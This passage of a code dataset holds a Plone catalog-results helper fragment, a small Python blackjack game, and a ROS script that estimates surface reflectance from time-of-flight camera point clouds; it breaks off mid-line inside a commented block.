''},\n response=None)\n fake_req.processInputs()\n kw = fake_req.form\n else:\n kw = {}\n\n return self.context.queryCatalog(**kw)\n\n @view.memoize\n def index(self, path):\n \"\"\"Return the of the item within the results.\"\"\"\n rid = self.context.portal_catalog.getrid(path)\n idx = 0\n for brain in self():\n if brain.getRID() == rid:\n return idx\n idx += 1\n","repo_name":"cedricmessiant/collective.nextprev","sub_path":"collective/nextprev/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26310108135","text":"import random\r\nCARDS = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\ncpu_cards = []\r\nplayer_cards = []\r\n\r\n\r\ndef pick_card():\r\n card_pos = random.randint(0, 12)\r\n # print(card_pos)\r\n return CARDS[card_pos]\r\n\r\n\r\ndef cpu_pick():\r\n cpu_card = pick_card()\r\n return cpu_cards.append(cpu_card)\r\n\r\n\r\ndef player_pick():\r\n player_card = pick_card()\r\n return player_cards.append(player_card)\r\n\r\n\r\ndef show_hands():\r\n print(f\"CPU hand: {cpu_cards}\")\r\n print(f\"Player hand: {player_cards}\")\r\n\r\n\r\ndef check_winner():\r\n player_score = sum(player_cards)\r\n if player_score > 21:\r\n print(\"You lose!!!\")\r\n return False\r\n elif player_score == 21:\r\n print(\"You win!!!\")\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef get_card():\r\n answer = input(\"Do you want pick a card? y or n:\")\r\n if answer == 'y':\r\n player_pick()\r\n elif answer == 'n':\r\n check_winner()\r\n else:\r\n print(\"Invalid input.\")\r\n get_card()\r\n\r\n\r\ndef play():\r\n keep_playing = check_winner()\r\n while keep_playing:\r\n get_card()\r\n show_hands()\r\n keep_playing = check_winner()\r\n\r\n\r\ndef start():\r\n print('Welcome to blackjack game!')\r\n cpu_pick()\r\n player_pick()\r\n player_pick()\r\n show_hands()\r\n play()\r\n\r\n\r\nstart()\r\n","repo_name":"b01tech/python-stydy","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18171424295","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport re\nimport copy\nfrom datetime import datetime\nimport time\n\nimport ransac_plane as pyrsc\n\nimport rospy\nimport rosbag\nimport cv2\nimport open3d as o3d\n#import pyransac3d as pyrsc\nimport numpy as np\nimport ros_numpy\nimport tf2_ros as tf2\nimport message_filters\nimport tf2_geometry_msgs\nimport moveit_msgs.msg\nfrom tf2_msgs.msg import TFMessage\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nfrom geometry_msgs.msg import Point, PointStamped, Pose, PoseStamped, TransformStamped\nfrom interactive_markers.interactive_marker_server import InteractiveMarkerServer, InteractiveMarkerFeedback\nfrom visualization_msgs.msg import Marker, InteractiveMarker, InteractiveMarkerControl, MarkerArray\nfrom std_msgs.msg import Empty\nfrom jsk_rviz_plugins.msg import OverlayText\nfrom sensor_msgs.msg import Image, CameraInfo, PointCloud2, PointField\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom image_geometry import PinholeCameraModel\nfrom scipy.spatial import KDTree\nfrom scipy.optimize import least_squares\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom tqdm import tqdm\n\nnp.set_printoptions(threshold=sys.maxsize)\n\n# For real time debugging\nclass TimerError(Exception):\n\n \"\"\"A custom exception used to report errors in use of Timer class\"\"\"\n\nclass Timer:\n def __init__(self):\n self._start_time = None\n\n def start(self):\n \"\"\"Start a new timer\"\"\"\n if self._start_time is not None:\n raise TimerError(f\"Timer is running. Use .stop() to stop it\")\n\n self._start_time = time.perf_counter()\n\n def stop(self):\n \"\"\"Stop the timer, and report the elapsed time\"\"\"\n if self._start_time is None:\n raise TimerError(f\"Timer is not running. Use .start() to start it\")\n\n elapsed_time = time.perf_counter() - self._start_time\n self._start_time = None\n print(f\"Elapsed time: {elapsed_time:0.4f} seconds\")\n\n\nclass image_converter:\n\n def __init__(self):\n\n # For data analysis\n base_directory = \"/home/introlab/Documents/git_rcm/rcm_poncage/pa_tof/test_data/\"\n test_name = \"data_{0}\" .format(datetime.now())[:-7]\n self.data_directory = os.path.join(base_directory, test_name)\n os.mkdir(self.data_directory)\n\n # IMAGE PIPELINE -------------------------------------------------------------------------------------------------------------\n self.image_intensity_sub = rospy.Subscriber(\"/helios_camera_node/intensity_helios2\", Image, self.callbackIntensity, queue_size=10)\n self.image_points_sub = rospy.Subscriber(\"/helios_camera_node/depth_helios2\", PointCloud2, self.callbackTOF, queue_size=10)\n\n self.bridge = CvBridge()\n\n self.wanted_rate = rospy.get_param(\"/helios_camera_node/node_rate\")\n if rospy.get_param(\"/sensor_used/offline\"):\n self.img_dim_x = 640\n self.img_dim_y = 480\n else:\n self.img_dim_x = rospy.get_param(\"/helios_camera_node/intensity_width\")\n self.img_dim_y = rospy.get_param(\"/helios_camera_node/intensity_height\")\n # Scale larger on takeB to make shure that all of takeA is included\n self.border_size_x_takeA = int(self.img_dim_x * 0.30)\n self.border_size_y_takeA = int(self.img_dim_y * 0.30)\n self.border_size_x_takeB = int(self.img_dim_x * 0.20)\n self.border_size_y_takeB = int(self.img_dim_y * 0.20)\n\n self.last_cv_image_raw = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_takeA = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_takeB = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_algoA = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_algoB = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_segmented = np.zeros((self.img_dim_y-2*self.border_size_y_takeA,self.img_dim_x-2*self.border_size_x_takeA,3), dtype=np.uint16)\n\n self.image_pub_textureA = rospy.Publisher(\"image_textureA\", Image, queue_size=10)\n self.image_pub_textureB = rospy.Publisher(\"image_textureB\", Image, queue_size=10) \n self.image_pub_segmented = rospy.Publisher(\"image_segmented\", Image, queue_size=10) \n\n\n # POINTCLOUD PIPELINE --------------------------------------------------------------------------------------------------------\n self.last_pc_msg = PointCloud2()\n self.pc_takeA = np.zeros((self.img_dim_y,self.img_dim_x, 3), dtype=float)\n self.pc_takeB = np.zeros((self.img_dim_y,self.img_dim_x, 3), dtype=float)\n self.dtype_takeA = np.dtype\n self.dtype_takeB = np.dtype\n self.header_takeA = PointCloud2().header\n self.header_takeB = PointCloud2().header\n\n self.Ro = np.ones((self.img_dim_y-2*self.border_size_y_takeA, self.img_dim_x-2*self.border_size_x_takeA), dtype=float)*0.95\n self.n = np.ones_like(self.Ro)*1.15\n self.new_param = False\n\n self.point_cloud_pub_takeA = rospy.Publisher(\"point_cloud_takeA\", PointCloud2, queue_size=10)\n self.point_cloud_pub_takeB = rospy.Publisher(\"point_cloud_takeB\", PointCloud2, queue_size=10)\n self.point_cloud_pub_takeB_inprogress = rospy.Publisher(\"point_cloud_takeB_inprogress\", PointCloud2, queue_size=10)\n self.point_cloud_pub_takeB_warpped = rospy.Publisher(\"point_cloud_takeB_warpped\", PointCloud2, queue_size=10)\n\n self.point_cloud_pub_normalA = rospy.Publisher(\"point_cloud_normalA\", MarkerArray, queue_size=10)\n self.point_cloud_pub_normalB = rospy.Publisher(\"point_cloud_normalB\", MarkerArray, queue_size=10)\n\n self.point_cloud_pub_planeA = rospy.Publisher(\"point_cloud_planeA\", Marker, queue_size=10)\n self.point_cloud_pub_planeB = rospy.Publisher(\"point_cloud_planeB\", Marker, queue_size=10)\n\n\n # TEXTOVERLAY ----------------------------------------------------------------------------------------------------------------\n self.points_info = rospy.Publisher(\"points_info\", OverlayText, queue_size=10)\n self.overlay_msg = OverlayText()\n self.overlay_msg.width = 500\n self.overlay_msg.height = 500\n self.overlay_msg.text_size = 10\n self.overlay_msg.left = 10\n self.overlay_msg.top = 10\n self.overlay_msg.font = \"Ubuntu Mono Regular\"\n self.overlay_msg.bg_color.a = 0\n self.overlay_msg.fg_color.r = 25 / 255.0\n self.overlay_msg.fg_color.g = 1\n self.overlay_msg.fg_color.b = 1\n self.overlay_msg.fg_color.a = 1\n\n \n # RVIZ INTERFACE ----------------------------------------------------------------------------------------------------------------\n self.img_index = 0\n self.full_path = \"\"\n self.save_image = rospy.Subscriber(\"/consol_save_image\", Empty, self.callbackSaveImage, queue_size=10)\n self.save_takes_in_bag = rospy.Subscriber(\"/consol_save_takes\", Empty, self.callbackSaveTakeInBag, queue_size=10)\n\n self.takenA = False\n self.takenB = False\n self.take_image_A = rospy.Subscriber(\"/consol_take_image_A\", Empty, self.callbackTakeImageA, queue_size=10)\n self.take_image_B = rospy.Subscriber(\"/consol_take_image_B\", Empty, self.callbackTakeImageB, queue_size=10)\n self.run_algo = rospy.Subscriber(\"/consol_run_algo\", Empty, self.runAlgoAndPublish, queue_size=10)\n\n \n def rospc_to_nppc(self, rospc):\n # x = 0, y = 1, z = 2, i = 3\n cloud_tuple = ros_numpy.numpify(rospc)\n dtype = cloud_tuple.dtype\n cloud_array = np.array([[[a,b,c,d] for a, b, c ,d in temp] for temp in cloud_tuple])\n #print(dtype)\n #print(cloud_array.shape)\n #print(cloud_array[320,240])\n return cloud_array, dtype, rospc.header\n\n def nppc_to_rospc(self, nppc, dtype, ros_msg_header):\n # x = 0, y = 1, z = 2, i = 3\n cloud_tuple = np.array([[(a,b,c,d) for a, b, c ,d in temp] for temp in nppc], dtype=dtype)\n #print(cloud_tuple.shape)\n #print(cloud_tuple[320,240])\n cloud_msg = ros_numpy.msgify(PointCloud2, cloud_tuple)\n cloud_msg.header = ros_msg_header # Only parts not inferrable from numpy array + dtype\n return cloud_msg\n\n\n def callbackSaveImage(self, data):\n # Save rgb image in current test folder \n os.chdir(self.data_directory)\n img_bank_array = os.listdir(self.data_directory)\n int_bank_array = []\n for img in img_bank_array:\n int_bank_array.append(int(re.findall(r'\\d+', img)[0]))\n \n try:\n last_img_num = max(int_bank_array)\n except ValueError:\n last_img_num = 0\n \n cv2.imwrite(\"img_raw{0}.png\" .format(last_img_num+1), self.last_cv_image_raw.astype(np.uint16))\n rospy.loginfo(\"Now {0} images in bank for the current test\" .format(last_img_num+1))\n \n def saveTakeInBag(self, base_directory):\n try:\n os.chdir(base_directory)\n bag_name = \"default_takes.bag\"\n bag = rosbag.Bag(bag_name, 'w')\n\n bag.write(\"image_takeA\", self.bridge.cv2_to_imgmsg(self.image_takeA, \"mono16\"))\n bag.write(\"image_takeB\", self.bridge.cv2_to_imgmsg(self.image_takeB, \"mono16\"))\n bag.write(\"pc_takeA\", self.nppc_to_rospc(self.pc_takeA, self.dtype_takeA, self.header_takeA))\n bag.write(\"pc_takeB\", self.nppc_to_rospc(self.pc_takeB, self.dtype_takeB, self.header_takeB)) \n\n except Exception as e:\n bag.close()\n rospy.logerr(\"Something went wrong with the writing of the bag:\")\n rospy.logerr(e)\n else:\n bag.close()\n rospy.loginfo(\"An image and a point cloud (ros_msg) has been saved in {0} for both takes\" .format(bag_name))\n\n def callbackSaveTakeInBag(self, data):\n # Save current takes in a rosbag for later default use\n\n # Run only if both take are aquired\n if(self.takenA and self.takenB):\n self.saveTakeInBag(\"/home/introlab/Documents/git_rcm/rcm_poncage/pa_tof/launch\")\n else:\n rospy.logerr(\"Data incomplet, at least one take missing\")\n\n\n def callbackTakeImageA(self, data):\n rospy.loginfo(\"Current image saved as A\")\n self.image_takeA = self.last_cv_image_raw\n self.pc_takeA, self.dtype_takeA, self.header_takeA = self.rospc_to_nppc(self.last_pc_msg)\n self.takenA = True\n\n def callbackTakeImageB(self, data):\n rospy.loginfo(\"Current image saved as B\")\n self.image_takeB = self.last_cv_image_raw\n self.pc_takeB, self.dtype_takeB, self.header_takeB = self.rospc_to_nppc(self.last_pc_msg)\n self.takenB = True\n\n\n def callbackIntensity(self, data):\n # Update current buffer image\n try:\n self.last_cv_image_raw = self.bridge.imgmsg_to_cv2(data, desired_encoding='mono16')\n except CvBridgeError as e:\n print(e)\n\n def callbackTOF(self, data):\n self.last_pc_msg = data\n \n\n def incidence_angle(self, point_cloud, scaled_pc, border_size_x, border_size_y, color):\n # Point cloud must only have a lenght of 3 in the last dimension\n cam_pose = np.array([0,0,0]) # Angle computed from normal point of view\n v = scaled_pc - cam_pose\n v = v/np.linalg.norm(v, axis=2)[..., None]\n v_full = point_cloud[..., :3] - cam_pose\n n = np.zeros_like(v)\n\n k = 11 #TODO: adjust according to the rest of the algo\n k_half = int((k-1)/2) # Has to be smaller than border_size_x AND border_size_y\n kernel_size = (k,k)\n # Compute on full pc, but only inner part is used\n v_centroid = cv2.blur(v_full, kernel_size, cv2.BORDER_REPLICATE)\n v_centroid = v_centroid[border_size_y:self.img_dim_y-border_size_y, border_size_x:self.img_dim_x-border_size_x, :]\n\n # For display purposes\n normal_marker_list = []\n normal_marker_index = 0\n\n # Inspired from: https://github.com/PickNikRobotics/rviz_visual_tools/blob/master/src/rviz_visual_tools.cpp\n # and: https://stackoverflow.com/questions/1171849/finding-quaternion-representing-the-rotation-from-one-vector-to-another\n for i in tqdm(range(v.shape[0]), desc =\"Angle of incidence: \", leave=True):\n for j in range(v.shape[1]):\n v_neighbors = v_full[(i+border_size_y-k_half-1):(i+border_size_y+k_half), (j+border_size_x-k_half-1):(j+border_size_x+k_half), :].reshape(k**2, 3)\n\n u, s, vh = np.linalg.svd(v_neighbors - v_centroid[i, j], full_matrices=False, compute_uv=True)\n if vh[-1,2] < 0:\n n[i,j] = vh[-1,:]\n else:\n n[i,j] = vh[-1,:] * -1\n\n # For display in rviz\n if not normal_marker_index%200:\n marker = Marker()\n marker.header.frame_id = \"camera_frame\"\n marker.header.stamp = rospy.Time.now()\n marker.type = 0 # Arrow shape\n marker.id = normal_marker_index\n marker.scale.x = 0.002 # m\n marker.scale.y = 0.006 # m\n marker.scale.z = 0.0\n marker.color.r = color[0]\n marker.color.g = color[1]\n marker.color.b = color[2]\n marker.color.a = 0.75\n marker.pose.orientation.x = 0.0 # For warning...\n marker.pose.orientation.y = 0.0 # For warning...\n marker.pose.orientation.z = 0.0 # For warning...\n marker.pose.orientation.w = 1.0 # For warning...\n P_start = Point()\n P_start.x = scaled_pc[i,j,0]\n P_start.y = scaled_pc[i,j,1]\n P_start.z = scaled_pc[i,j,2]\n P_end = Point()\n P_end.x = scaled_pc[i,j,0] + (n[i,j,0]/10)\n P_end.y = scaled_pc[i,j,1] + (n[i,j,1]/10)\n P_end.z = scaled_pc[i,j,2] + (n[i,j,2]/10)\n marker.points = [P_start, P_end]\n normal_marker_list.append(marker)\n\n normal_marker_index += 1\n \n product = np.einsum('ijk,ijk->ij', (v * -1), n) # Inverse v and DOT product with n\n theta = np.arccos(product)\n\n return theta, normal_marker_list\n\n\n def global_plane(self, pc, color):\n # Point cloud must only have a lenght of 3 in the last dimension\n plane = pyrsc.Plane()\n best_eq, best_inliers = plane.fit(pc, 0.0015, minPoints=int(pc.shape[0]*pc.shape[1]*0.4), maxIteration=10000) # Good compromise\n best_eq = np.array(best_eq)\n if(best_eq[3] > 0):\n best_eq = -best_eq\n\n n = best_eq[:3]\n n_norm = np.linalg.norm(n)\n n_normalized = n / n_norm\n unitZ = np.array([0,0,1])\n distance = best_eq[3] / n_norm\n center_point = -1 * distance * n_normalized # Not centered with point cloud... TODO: better fix than middle pixel of the image\n\n orientation = np.cross(unitZ, n_normalized)\n orientation = np.append(orientation, np.dot(unitZ, n_normalized) + np.sqrt(np.linalg.norm(unitZ)**2 + n_norm**2))\n orientation_normalized = orientation / np.linalg.norm(orientation)\n\n marker = Marker()\n marker.header.frame_id = \"camera_frame\"\n marker.header.stamp = rospy.Time.now()\n marker.type = 1 # Square shape\n marker.id = 0\n marker.scale.x = 1 # m\n marker.scale.y = 1 # m\n marker.scale.z = 0.001 # m\n marker.color.r = color[0]\n marker.color.g = color[1]\n marker.color.b = color[2]\n marker.color.a = 0.5\n #marker.pose.position.x = center_point[0]\n #marker.pose.position.y = center_point[1]\n #marker.pose.position.z = center_point[2]\n mid_point = pc[int(pc.shape[0]/2), int(pc.shape[1]/2), :]\n marker.pose.position.x = mid_point[0]\n marker.pose.position.y = mid_point[1]\n marker.pose.position.z = mid_point[2]\n marker.pose.orientation.x = orientation_normalized[0]\n marker.pose.orientation.y = orientation_normalized[1] \n marker.pose.orientation.z = orientation_normalized[2]\n marker.pose.orientation.w = orientation_normalized[3]\n\n return marker, n_normalized, mid_point[2] #distance\n\n\n def residual(self, param, rA, thetaA, rB, thetaB):\n Ro = param[0]\n n = param[1]\n return (Ro*(np.cos((2-1/n)*thetaA))**n - rA) + (Ro*(np.cos((2-1/n)*thetaB))**n - rB)\n \n def residual_single(self, param, r, theta):\n Ro = param[0]\n n = param[1]\n return Ro*(np.cos((2-1/n)*theta))**n - r\n\n def runAlgoAndPublish(self, data):\n valid_takes = False\n\n if(self.takenA and self.takenB):\n valid_takes = True\n self.saveTakeInBag(self.data_directory)\n rospy.loginfo(\"Data complet, both takes saved in {0} as a ros bag\\n They will be use for the following calculation\" .format(self.data_directory))\n\n else:\n rospy.logwarn(\"Data incomplet, default previously saved takes will be used\")\n\n try:\n base_directory = \"/home/introlab/Documents/git_rcm/rcm_poncage/pa_tof/launch\"\n os.chdir(base_directory)\n bag_name = \"default_takes.bag\"\n bag = rosbag.Bag(bag_name)\n\n self.image_takeA = self.bridge.imgmsg_to_cv2(next(bag.read_messages(topics=[\"image_takeA\"]))[1], desired_encoding='mono16')\n self.image_takeB = self.bridge.imgmsg_to_cv2(next(bag.read_messages(topics=[\"image_takeB\"]))[1], desired_encoding='mono16')\n\n ros_msg_pc_takeA = next(bag.read_messages(topics=[\"pc_takeA\"]))[1]\n ros_msg_pc_takeB = next(bag.read_messages(topics=[\"pc_takeB\"]))[1]\n # Patch: https://github.com/eric-wieser/ros_numpy/issues/2\n ros_msg_pc_takeA.__class__ = PointCloud2\n ros_msg_pc_takeB.__class__ = PointCloud2\n self.pc_takeA, self.dtype_takeA, self.header_takeA = self.rospc_to_nppc(ros_msg_pc_takeA) \n self.pc_takeB, self.dtype_takeB, self.header_takeB = self.rospc_to_nppc(ros_msg_pc_takeB)\n\n except Exception as e:\n bag.close()\n rospy.logerr(\"Something went wrong with the reading of the bag:\")\n rospy.logerr(e)\n else:\n bag.close()\n valid_takes = True\n rospy.loginfo(\"Default bag successfuly read for both takes, algo is starting\")\n\n if valid_takes:\n t = Timer()\n\n # PREPROCESSING --------------------------------------------------------------------------------------------------------------\n t.start()\n # [R,G,B]\n color_takeA = [0,0,1]\n color_takeB = [1,0,1]\n\n # To validate algo with \"perfect\" data TODO\n synt_data = rospy.get_param(\"/sensor_used/synt_data\")\n if synt_data:\n rospy.logwarn(\"synthetic data parameter will be used\")\n dummy_pcA = np.zeros_like(self.pc_takeA)\n dummy_pcB = np.zeros_like(self.pc_takeB)\n\n dummy_pcA[..., 0] = np.tile(np.linspace(-0.4, 0.4, dummy_pcA.shape[1]), (dummy_pcA.shape[0],1))\n dummy_pcA[..., 1] = np.tile(np.linspace(0.25, -0.25, dummy_pcA.shape[0])[None,...].T, (1,dummy_pcA.shape[1]))\n dummy_pcA[..., 2] = 0.75\n\n print(\"Dummy_pcA shape and samples points:\")\n print(dummy_pcA.shape)\n print(dummy_pcA[0,0])\n print(dummy_pcA[100,100])\n print(dummy_pcA[-1,-1])\n\n dummy_pcB[..., 0] = np.tile(np.linspace(-0.5, 0.5, dummy_pcB.shape[1]), (dummy_pcB.shape[0],1))\n dummy_pcB[..., 2] = np.tile(np.linspace(1, 0.5, dummy_pcB.shape[1]), (dummy_pcB.shape[0],1))\n y_lim = np.linspace(0.4, 0.2, dummy_pcB.shape[1])\n for i, _ in enumerate(dummy_pcB[...,1].T):\n dummy_pcB[:,i,1] = np.linspace(y_lim[i], -y_lim[i], dummy_pcB.shape[0])\n\n print(\"Dummy_pcB shape and samples points:\")\n print(dummy_pcB.shape)\n print(dummy_pcB[0,0])\n print(dummy_pcB[100,100])\n print(dummy_pcB[-1,-1])\n\n self.pc_takeA = dummy_pcA\n self.pc_takeB = dummy_pcB\n\n # Cut the outer/biast part of the image (scaling)\n scaled_pcA_full = self.pc_takeA[self.border_size_y_takeA:self.img_dim_y-self.border_size_y_takeA, self.border_size_x_takeA:self.img_dim_x-self.border_size_x_takeA, :]\n scaled_pcB_full = self.pc_takeB[self.border_size_y_takeB:self.img_dim_y-self.border_size_y_takeB, self.border_size_x_takeB:self.img_dim_x-self.border_size_x_takeB, :]\n\n # Remove intensity\n scaled_pcA = scaled_pcA_full[..., :3] \n scaled_pcB = scaled_pcB_full[..., :3] \n\n rospy.loginfo(\"Preprocessing:\")\n t.stop()\n\n # ANGLE OF INCIDENCE -------------------------------------------------------------------------------------------------------- \n t.start()\n # Compute incidences angles\n thetaA, normal_marker_listA = self.incidence_angle(self.pc_takeA, scaled_pcA, self.border_size_x_takeA, self.border_size_y_takeA, color_takeA)\n thetaB_temp, normal_marker_listB = self.incidence_angle(self.pc_takeB, scaled_pcB, self.border_size_x_takeB, self.border_size_y_takeB, color_takeB)\n\n rospy.loginfo(\"Angle of incidence:\")\n t.stop()\n\n # WARPING --------------------------------------------------------------------------------------------------------------\n t.start()\n\n # References planes\n ref_camera_normal = np.array([0,0,1]) # Constant from normal point of view\n marker_Gplane_takeA, normal_Gplane_takeA, distance_Gplane_takeA = self.global_plane(scaled_pcA, color_takeA)\n marker_Gplane_takeB, normal_Gplane_takeB, distance_Gplane_takeB = self.global_plane(scaled_pcB, color_takeB)\n\n # Geometric relation\n Gplane_thetaA = np.arccos(ref_camera_normal@normal_Gplane_takeA)\n Gplane_thetaB = np.arccos(ref_camera_normal@normal_Gplane_takeB)\n # To be independent of the side of takeB\n if Gplane_thetaA < Gplane_thetaB:\n Gplane_delta_theta = Gplane_thetaA-Gplane_thetaB\n dir_x = -1\n else:\n Gplane_delta_theta = Gplane_thetaB-Gplane_thetaA\n dir_x = 1\n Gplane_quaternion = quaternion_from_euler(0,Gplane_delta_theta,0)\n\n Gplane_hypo = 2 * distance_Gplane_takeA * np.cos((np.pi/2)-(Gplane_delta_theta/2)) # distance_Gplane_takeA sould = distance_Gplane_takeB\n\n # Transformation matrix -­> TODO: get transformation from robot TFs\n t_msg = TransformStamped()\n t_msg.header.frame_id = \"angle_frame\"\n t_msg.header.stamp = rospy.Time.now()\n t_msg.child_frame_id = \"camera_frame\"\n t_msg.transform.translation.x = dir_x * Gplane_hypo * np.cos(Gplane_delta_theta/2)\n t_msg.transform.translation.y = 0.0\n t_msg.transform.translation.z = Gplane_hypo * np.sin(Gplane_delta_theta/2)\n t_msg.transform.rotation.x = Gplane_quaternion[0]\n t_msg.transform.rotation.y = Gplane_quaternion[1]\n t_msg.transform.rotation.z = Gplane_quaternion[2]\n t_msg.transform.rotation.w = Gplane_quaternion[3] \n\n transform_matrix = ros_numpy.numpify(t_msg.transform)\n\n # Warp pcB\n homo_axe = np.ones((scaled_pcB.shape[0], scaled_pcB.shape[1], 1))\n scaled_pcB_homo = np.concatenate((scaled_pcB,homo_axe), axis=2)\n scaled_pcB_warp = (scaled_pcB_homo@transform_matrix.T)[..., :-1] # Transform and remove homogeneous part\n scaled_pcB_warp_inprogress = np.concatenate((scaled_pcB_warp, scaled_pcB_full[...,3][...,None]), axis=2) # Add back intensity for display purpose\n\n # Instanciation (thetas were computed in the previous section)\n iA = scaled_pcA_full[..., 3]\n dA = scaled_pcA_full[..., 2]\n\n iB = np.zeros_like(scaled_pcA_full[..., 3])\n dB = np.zeros_like(scaled_pcA_full[..., 2])\n thetaB = np.zeros_like(thetaA)\n\n # KDtree\n nbr_interp = 3\n nbr_represent_optimal = int(np.sqrt(scaled_pcB_warp.shape[0]*scaled_pcB_warp.shape[1]))\n tree = KDTree(scaled_pcB_warp.reshape((-1,3), order='F'), leafsize=nbr_represent_optimal, copy_data=True) \n #ind = tree.query(scaled_pcA.reshape(-1, 3), k=1, return_distance=False) # If we want to remove the for loop\n\n # Apply warp to intensity, distance and angle of takeB\n for i, points_list in enumerate(tqdm(scaled_pcA, desc =\"Warping: \", leave=True)):\n for j, pointA in enumerate(points_list):\n # Eucledian distance, only with x and y\n #closest = np.unravel_index(np.argmin(np.sum(np.abs(scaled_pcB_warp[...,:-1] - pointA[:-1]), axis=2)), scaled_pcB_warp.shape[:-1]) # https://stackoverflow.com/questions/48135736/what-is-an-intuitive-explanation-of-np-unravel-index\n\n # KDtree, with x, y, z\n dd, ii = tree.query(pointA[None,...], k=nbr_interp, distance_upper_bound=0.1, workers=8) # distance_upper_bound max 10cm\n closest = np.unravel_index(ii, scaled_pcB_warp.shape[:-1], order='F')\n\n # from tuple to usable array\n closest_array = np.concatenate((closest[0], closest[1]), axis=0) \n\n # Interpolate\n nbr_neighbors_found = closest_array.shape[1]\n for l in range(nbr_neighbors_found):\n iB[i,j] = iB[i,j] + scaled_pcB_full[closest_array[0,l],closest_array[1,l],3]/nbr_neighbors_found\n dB[i,j] = dB[i,j] + scaled_pcB_full[closest_array[0,l],closest_array[1,l],2]/nbr_neighbors_found\n thetaB[i,j] = thetaB[i,j] + thetaB_temp[closest_array[0,l],closest_array[1,l]]/nbr_neighbors_found\n\n # Update x, y, z to fit with takeA and add intensity for display\n #scaled_pcB_warp[..., 0:2] = scaled_pcA[..., 0:2] # if only x, y\n scaled_pcB_warp_full = np.concatenate((scaled_pcA, iB[..., None]), axis=2)\n\n rospy.loginfo(\"Warping:\")\n t.stop()\n\n # ALGO PROPER -------------------------------------------------------------------------------------------------------- \n t.start()\n\n k = 10 # Radiometric scale factor [(R(spectralon)/R(mesure))/0.6]\n coeff = [8.94, 3.92, 1.79, 1.38, 4.44] # A, B, C, D, E from values in article\n fA = (coeff[0] + coeff[1]/dA**2) * (coeff[2]*thetaA**2 + coeff[3]*thetaA + coeff[4]) # arbitrary physical model from article\n fB = (coeff[0] + coeff[1]/dB**2) * (coeff[2]*thetaB**2 + coeff[3]*thetaB + coeff[4]) # arbitrary physical model from article\n if synt_data:\n synt_Ro = 0.85\n synt_n = 1.15\n rA = synt_Ro*np.power(np.cos((2-1/synt_n)*thetaA), synt_n)\n rB = synt_Ro*np.power(np.cos((2-1/synt_n)*thetaB), synt_n)\n else:\n rA = iA / (fA*k) # Absolute surface reflectance\n rB = iB / (fB*k) # Absolute surface reflectance\n\n # Define bounds for parameters\n bounds = ([0.5, 1.0], [1.5, 1.3])\n \n # Define least squares problem for each pixel in the image\n for i in tqdm(range(rA.shape[0]), desc =\"Least square adjustment: \", leave=True):\n for j in tqdm(range(rA.shape[1]), desc =\"current row: \", leave=False):\n\n # Define initial parameter guesses\n params = [self.Ro[i,j], self.n[i,j]]\n result = least_squares(self.residual, params, bounds=bounds, args=(rA[i,j], thetaA[i,j], rB[i,j], thetaB[i,j]), ftol=0.001, xtol=0.001, gtol=0.001, verbose=0)\n #result = least_squares(self.residual_single, params, bounds=bounds, args=(rB[i,j], thetaB[i,j]), xtol=0.001, verbose=0)\n \n # Extract estimated parameters\n self.Ro[i,j] = result.x[0]\n self.n[i,j] = result.x[1]\n if not result.success:\n print(\"pixel nbr:\", i, \",\", j, \"failed to converge\")\n\n # Print estimated parameters\n self.new_param = True\n \n '''# Estimate Ro and n from R_i and theta_i\n deltaC = np.ones_like(np.stack((thetaA,thetaB), axis=2))[..., :, None]\n deltaC_filtered = np.ones_like(deltaC)\n e = np.ones_like(deltaC)\n \n tolerance = 0.01\n while abs(np.mean(e)) > tolerance:\n print(\"Iteration start -----------------------------------------------------------------------------\")\n Ro = self.Ro\n n = self.n\n test = np.cos((2-1/n)*thetaA)\n print(\"cos -> \", \"min:\", np.amin(test), \"max:\", np.amax(test), \"mean:\", np.mean(test), \"std:\", np.std(test), \"var:\", np.var(test))\n print(\"Ro -> \", \"min:\", np.amin(Ro), \"max:\", np.amax(Ro), \"mean:\", np.mean(Ro), \"std:\", np.std(Ro), \"var:\", np.var(Ro))\n print(\"n -> \", \"min:\", np.amin(n), \"max:\", np.amax(n), \"mean:\", np.mean(n), \"std:\", np.std(n), \"var:\", np.var(n))\n dRA_dRo = np.power(np.cos((2-1/n)*thetaA), n)\n dRA_dn = Ro * np.power(np.cos((2-1/n)*thetaA), n) * (np.log(np.cos((2-1/n)*thetaA)) - np.tan(2-1/n)/n)\n dRB_dRo = np.power(np.cos((2-1/n)*thetaB), n)\n dRB_dn = Ro * np.power(np.cos((2-1/n)*thetaB), n) * (np.log(np.cos((2-1/n)*thetaB)) - np.tan(2-1/n)/n)\n a = np.transpose(np.array([[dRA_dRo, dRA_dn], [dRB_dRo, dRB_dn]]), (2,3,0,1))\n #a_T = np.transpose(a, (0,1,3,2))\n e = np.transpose(np.array([[rA - Ro*np.power(np.cos((2-1/n)*thetaA), n)], [rB - Ro*np.power(np.cos((2-1/n)*thetaB), n)]]), (2,3,0,1))\n print(\"A: \", a.shape)\n #print(\"A_T: \", a_T.shape)\n print(\"E: \", e.shape)\n print(\"deltaC: \", deltaC.shape)\n\n #deltaC = np.linalg.inv(a_T@a) @ a_T @ e # for non-square \"a\" matrix\n deltaC = np.linalg.inv(a) @ e\n print(\"E -> \", \"min:\", np.amin(e), \"max:\", np.amax(e), \"mean:\", np.mean(e), \"std:\", np.std(e), \"var:\", np.var(e))\n print(\"deltaC -> \", \"min:\", np.amin(deltaC), \"max:\", np.amax(deltaC), \"mean:\", np.mean(deltaC), \"std:\", np.std(deltaC), \"var:\", np.var(deltaC))\n\n learning_rate = 0.0001 #TODO: adjust\n deltaC_filtered = 